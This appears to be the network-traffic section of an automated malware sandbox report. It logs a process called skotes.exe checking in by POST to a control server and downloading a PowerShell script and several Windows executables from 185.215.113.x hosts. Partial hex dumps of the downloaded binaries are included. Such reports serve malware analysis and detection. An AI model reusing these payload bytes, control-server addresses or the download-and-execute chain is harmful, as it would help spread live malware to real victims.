                                                      Host: 185.215.113.103
                                                      Sep 24, 2024 15:34:11.084472895 CEST1236INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:34:10 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Last-Modified: Tue, 24 Sep 2024 12:56:26 GMT
                                                      ETag: "1c0200-622dd088a9fca"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 1835520
                                                      Content-Type: application/x-msdos-program
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 70 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 36 44 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CXmYpy`\nRichPEL/f$pi@i6D@P%d% %(@.rsrc %8@.idata %8@ )%:@fcorzhaoO<@ykxfeacd`i@.taggant0pi"@
                                                      Sep 24, 2024 15:34:11.084500074 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:11.084515095 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:11.084731102 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:11.084762096 CEST1236INData Raw: 9a a1 47 bf 90 2d d9 77 e6 bd cf a4 a7 f0 69 b2 9b 53 07 5c 48 5b 64 6d 44 72 45 a4 e7 f1 de 4b eb e9 e1 78 eb 05 13 58 6f 64 ae 09 9b 23 fa fa 61 69 d0 64 52 17 3b 5e d4 d6 43 a4 04 f2 0f 8d a2 d7 13 24 b7 37 25 a6 47 3b 55 6f 7e 4d b3 03 15 83
                                                      Data Ascii: G-wiS\H[dmDrEKxXod#aidR;^C$7%G;Uo~MEDiHKvKEhXeB|YsGbZIZ1;npD`q2P1BF=O[AU^e=kX;pEX16]?PNG_zEiyJre/
                                                      Sep 24, 2024 15:34:11.084780931 CEST1236INData Raw: 9b 09 fb 5a 48 cc 80 0f 4e 4f 8c ac 21 5b d1 78 93 ab d3 6e a9 13 d4 63 16 3f 07 1e 71 d2 68 ae ce e2 49 b8 9d bf 46 2d 72 21 e8 ed 73 b4 5f 01 5f aa 39 27 6b ea 24 b0 1d 9f b6 5b de c2 92 f9 30 ec db 58 b2 de fd 98 9e 6a f3 c3 03 c2 87 9d fa 03
                                                      Data Ascii: ZHNO![xnc?qhIF-r!s__9'k$[0XjFdy`*O'o;^z%?R[Ay@}LT#?XRs;DCim"JVLEDXOM|(8O_RVTGi'M WO)uHp
                                                      Sep 24, 2024 15:34:11.084799051 CEST1236INData Raw: 18 1e db 25 37 0b 9c c5 65 55 3f 38 b6 46 a1 8b 1b 63 da f8 eb 41 d0 19 48 58 a0 8b 9a 91 53 89 6b 1e cf 65 96 bc da 74 0e d4 70 bd 72 ce d6 5b ee 6a 1f 30 7e d4 8b 99 fa 75 d6 2d 96 0e 04 8b 7a d4 c7 8e b2 f5 83 cd 69 e0 b7 01 f7 ec 88 e5 13 4a
                                                      Data Ascii: %7eU?8FcAHXSketpr[j0~u-ziJDrj^TwYkrzRtIbt]kX{$x^C]SEOMx/co^MY`F4cN_nt)Cjdkcv2MjZeA"5h-=-ctZ^M
                                                      Sep 24, 2024 15:34:11.086189032 CEST1236INData Raw: d0 15 d6 85 86 cd b8 e7 86 2b 6e 1c 96 5c 53 ba 68 73 42 39 d6 6d 5f b3 48 e6 a0 9c 92 bd 5f 78 ca 6b 0f 84 3a 5b 4b 42 7a 64 77 f4 97 5c f3 ba 25 7c 87 5d 51 4e 83 a5 62 a3 d1 d7 ee 5c 5b f9 94 6d a7 8c 48 72 a0 38 99 e1 61 87 5a c7 d6 45 92 c1
                                                      Data Ascii: +n\ShsB9m_H_xk:[KBzdw\%|]QNb\[mHr8aZEtLlcFG8T[cC]ZW8o]dkfsn>Qb]HB=[qR]wX$8XGM(CxC^>ldV%XJGucHV8{hj]i`U:?
                                                      Sep 24, 2024 15:34:11.086210966 CEST1236INData Raw: e2 6b 27 8b 51 52 37 18 2f 8d 1e 84 d2 cd b1 f9 e3 f1 fd c2 23 5c cf f9 93 5c 8e 35 1e a6 43 5a 0e 25 4d e9 bc 9e 47 54 5c e5 ce fe 12 cd 77 69 c3 45 bf 05 63 6b 0d 0e 12 82 cc 55 eb 5c 8f 9d c7 c7 88 05 9e 27 9f 34 63 3a c7 31 9c 07 df ab c5 cd
                                                      Data Ascii: k'QR7/#\\5CZ%MGT\wiEckU\'4c:1Ck@S!"\'GK(^8x~MJb]Xm;xHMOIY?OaK&qv\8%KM|gH>Qa1h&Qpy[JNy!D
                                                      Sep 24, 2024 15:34:11.086227894 CEST1236INData Raw: be 59 36 85 d5 ce 72 d8 46 f1 7b 88 3b ba 22 b5 1a dd 9c 5b 62 6e 32 8f 61 c3 7a 9c 7a 39 25 bd ad 17 70 f4 6b 86 de 4d 11 6f 16 80 f2 c7 7e c9 12 e1 62 cc 81 75 f2 4b ef 21 2f 48 1a 75 48 34 97 f0 bb 44 04 1d ca 45 15 41 60 17 8a 4f df 7d d8 40
                                                      Data Ascii: Y6rF{;"[bn2azz9%pkMo~buK!/HuH4DEA`O}@~9MF|V1xcuX$O!"8MZK9bCh?YaH77*2`)u4?],hHBgz1<iIcIwQH
                                                      Sep 24, 2024 15:34:11.098855972 CEST1236INData Raw: 30 71 27 aa b2 ab 56 d8 9b 21 43 6d a7 49 67 f9 05 bb a7 63 1f 0b e5 56 da d4 9a 8a 35 9d f1 44 eb 40 e9 80 36 b3 80 03 bb bb 96 e5 4c ae e3 de da a4 5b e1 ad 08 ef df 15 5e f3 5a 04 45 d1 ac f5 f9 f5 6b cd 1f db af 39 4c 1a ee 64 5c 02 8e 19 7b
                                                      Data Ascii: 0q'V!CmIgcV5D@6L[^ZEk9Ld\{[Is_.u8k,{&MHh!n9.7W^At+(?,^./T:^#{jxCKZ^9g[cUbJ]57m


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.749711185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:15.379225016 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000002001&unit=246122658369
                                                      Sep 24, 2024 15:34:15.985038996 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:15 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.749712185.215.113.37807672C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:17.013644934 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.749713185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:19.197837114 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000015002&unit=246122658369
                                                      Sep 24, 2024 15:34:19.845160007 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:19 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.749714185.215.113.103807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:19.922971964 CEST53OUTGET /test/blo.ps1 HTTP/1.1
                                                      Host: 185.215.113.103


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.749715185.215.113.103807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:20.954911947 CEST53OUTGET /test/blo.ps1 HTTP/1.1
                                                      Host: 185.215.113.103


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.749716185.215.113.103807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:22.321347952 CEST53OUTGET /test/blo.ps1 HTTP/1.1
                                                      Host: 185.215.113.103


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.749717185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:24.927098989 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 30 31 38 30 34 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000018042&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.749718185.215.113.103807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:30.163701057 CEST56OUTGET /well/random.exe HTTP/1.1
                                                      Host: 185.215.113.103
                                                      Sep 24, 2024 15:34:30.814934015 CEST1236INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:34:30 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Last-Modified: Tue, 24 Sep 2024 13:27:18 GMT
                                                      ETag: "e1000-622dd76ee470c"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 921600
                                                      Content-Type: application/x-msdos-program
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2e be f2 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL.f"`w@pMD@@@d|@,u4@.text `.rdata@@.datalpH@.rsrc,@@@.relocuv@B
                                                      Sep 24, 2024 15:34:30.814970970 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23
                                                      Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$D
                                                      Sep 24, 2024 15:34:30.814982891 CEST1236INData Raw: 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 83 b8 98 fb ff ff 00 75 ce ff 15 6c c8 49 00
                                                      Data Ascii: F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItvL@IY
                                                      Sep 24, 2024 15:34:30.815174103 CEST1236INData Raw: 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c 8b 4e 04 8b 79 38 85 c9 74 06 51 e8 10 00 00
                                                      Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M
                                                      Sep 24, 2024 15:34:30.815186024 CEST1236INData Raw: 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 45 f8 01 00 00 00 51 8d 4d f8 51 50 8b ce e8
                                                      Data Ascii: G[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3}du
                                                      Sep 24, 2024 15:34:30.815210104 CEST620INData Raw: 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 33 db 66 39 58 08 0f 84 27 01 00 00 8b 55 90
                                                      Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]]EC}P
                                                      Sep 24, 2024 15:34:30.815226078 CEST1236INData Raw: 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53 e8 86 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 f9 01 00 00 8d 4d a8 e8 f1 01 00 00 8d 8d 54
                                                      Data Ascii: uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG|EIEE}`PG
                                                      Sep 24, 2024 15:34:30.815243959 CEST1236INData Raw: 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00 85 c0 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 68 18 14 4d 00 8b ce e8 2c 03 00 00 84 c0 0f
                                                      Data Ascii: D$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa|$sY4=MMuW0M=Mu
                                                      Sep 24, 2024 15:34:30.815285921 CEST1236INData Raw: 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57 68 58 ca 49 00 e8 cf 1a 02 00 59 59 85 c0 0f 84 8b fd 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 a5 1a 02 00 59 59 85 c0 0f 84 99 fd 03 00 57
                                                      Data Ascii: zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~
                                                      Sep 24, 2024 15:34:30.815299034 CEST1236INData Raw: 00 8b 46 04 8b ce 03 c7 50 e8 69 71 00 00 8b 1e 8d 04 3f 50 8b 46 04 ff 75 08 8d 04 43 50 e8 ed d9 01 00 01 7e 04 83 c4 0c 8b 06 33 d2 8b 4e 04 5f 66 89 14 48 8b c6 5e 5b 5d c2 08 00 55 8b ec 83 e4 f8 b8 3c 00 01 00 e8 f3 ea 03 00 8b 45 08 8d 4c
                                                      Data Ascii: FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#MW#M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M<I#M#M#M
                                                      Sep 24, 2024 15:34:30.819838047 CEST1236INData Raw: 71 fa 03 00 8b 86 98 01 00 00 89 44 24 24 89 07 80 3d 68 13 4d 00 01 8d 44 24 10 50 0f 84 80 fa 03 00 6a 00 ff 15 d0 c4 49 00 c6 05 68 13 4d 00 01 8b ce e8 07 00 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec cc 04 00 00 80 3d 68 13 4d 00 00
                                                      Data Ascii: qD$$=hMD$PjIhM_^[]U=hMVhL$#)=gM93fD$D$PL$1=eMM~`'hML$)$(VjPML$$T$$3F$$ h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.749719185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:34.175898075 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 31 39 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000019101&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.749723185.215.113.16807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:34:40.193196058 CEST55OUTGET /soka/random.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:34:40.905320883 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:34:40 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 1873408
                                                      Last-Modified: Tue, 24 Sep 2024 13:28:16 GMT
                                                      Connection: keep-alive
                                                      ETag: "66f2be70-1c9600"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 60 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@f`J@J>@WkJJIJ @.rsrc@.idata @ *@qnrefdmv0|@gekfttamPJp@.taggant0`J"t@
                                                      Sep 24, 2024 15:34:40.905358076 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:40.905477047 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:40.905510902 CEST672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Sep 24, 2024 15:34:40.905545950 CEST1236INData Raw: 11 8b a1 cb 2f 44 15 6b 78 43 19 6b 46 a5 f6 10 c7 5f dd 50 3c 43 b0 79 0c d3 52 3c 51 2d 15 4c 92 44 d5 3c 20 02 c2 1a d0 ac d4 15 16 29 19 b3 5d 93 39 ca 52 93 d3 0d a4 63 f3 ba 1f 7f de 2b ad 33 81 8f f1 e7 d9 1e 2f 8b 85 13 ea 54 41 8a 92 53
                                                      Data Ascii: /DkxCkF_P<CyR<Q-LD< )]9Rc+3/TASth9C5'vn95+TEdM=b9R+3^mbE%80"MDZM:313v/4-N0DXA?.++;gm+APsv_@s<G1mi/[f>jE
                                                      Sep 24, 2024 15:34:40.905591965 CEST1236INData Raw: 7e 33 b4 be d0 e3 a9 af 2e 54 f9 a9 52 f3 d8 4f c7 5c 31 d4 97 34 95 3a 20 a2 c2 3a fc 48 74 37 2e 37 35 4d 62 44 10 1b 9e ab 54 84 2e 2b 45 4f 3f 62 35 4d fe 44 34 71 4e c5 31 2b 0a 4c 3a 2a 16 73 f6 ef f4 39 b0 7c 6e 24 d1 ba 43 34 b0 6d 25 cb
                                                      Data Ascii: ~3.TRO\14: :Ht7.75MbDT.+EO?b5MD4qN1+L:*s9|n$C4m%M;jQu.+%56kcBD.'uSg!-9Q&9?<l/..D *YiqM+.ScVRTs:nKC57"++<R3,1>'AkpO~E 3++PP
                                                      Sep 24, 2024 15:34:40.905626059 CEST448INData Raw: d2 5c c3 7c 8e 70 d1 d6 67 ac 0a 0c b3 98 49 4c 9e 6e 90 4d 71 8b d1 52 c4 56 ed 1a 9f 6b b5 14 9e 43 38 0c 9b 88 a9 14 f3 2b 42 63 60 f3 01 17 c8 b2 98 c6 64 a2 83 11 15 ff ec 54 ad f2 c0 e6 49 c7 b7 38 13 d3 b2 68 34 e3 33 47 40 e3 99 1d 58 eb
                                                      Data Ascii: \|pgILnMqRVkC8+Bc`dTI8h43G@X>$q^fUmc>7y:w2}e9age[=;y[8_RS kONr%#+o38Qynfp7Cgi >@@1
                                                      Sep 24, 2024 15:34:40.905658960 CEST1236INData Raw: 9b 94 37 96 59 29 be d1 97 72 bd 1a dd 45 2d 97 e3 3b d3 5b c1 00 bf 1f 92 df 77 69 28 7b 9d 0e 19 0b 64 b1 29 25 99 ee 69 e5 21 17 0a 40 1f 4e f2 cf c9 15 da d4 c1 84 f5 63 b9 a4 1d f4 c5 0b eb cf cb 63 ce a7 f9 92 3b 43 ed 26 6a 79 75 b8 42 d2
                                                      Data Ascii: 7Y)rE-;[wi({d)%i!@Ncc;C&jyuB&f\NE%$1W+DL@5lx2!F|25(o[Xs2eK]#ScDU5Cx1`Py9"j"09mA_o4RFv9s?8)
                                                      Sep 24, 2024 15:34:40.905694008 CEST1116INData Raw: e0 7b c1 56 58 68 f2 6a 89 24 43 53 a2 28 1c c7 81 b8 ce 1a 17 ab 3a 58 de 0c fd c4 aa 97 38 03 05 29 68 c9 59 cf 76 53 6b 1d 7f db 16 57 41 6f 12 27 ca ad 7d 67 31 c3 a9 b3 f5 16 47 49 40 e2 d6 59 2f 53 36 d8 8f 93 97 a0 73 13 a1 37 f3 5a 2e ac
                                                      Data Ascii: {VXhj$CS(:X8)hYvSkWAo'}g1GI@Y/S6s7Z.I"zYPC%zZDDWZwd?$gjK6{QRruaA\fD}C@m80koH.%`Vu{nz7B:8[\/5
                                                      Sep 24, 2024 15:34:40.905728102 CEST1236INData Raw: fb a3 fc c6 91 fd 01 d5 3f 7e bc 95 5b 07 3d 1b 99 bd 61 01 fa 33 bf c2 15 5f f1 14 d1 32 16 96 1c 54 ba 1c d4 40 00 4f 7f a6 ad 17 eb a2 b3 7f 75 0e b8 9c 37 a4 39 0f 41 e3 d2 8b e2 32 45 f8 08 ba 5e 3f 8f db f1 1a 46 25 fb cc 27 47 0d 5c cc bd
                                                      Data Ascii: ?~[=a3_2T@Ou79A2E^?F%'G\_>-*gp'$*El0[dBX;)[X[(AgKu-PyL)1)^x?N<XIzieVs!o'U6>?,6&$3Lp3CN+
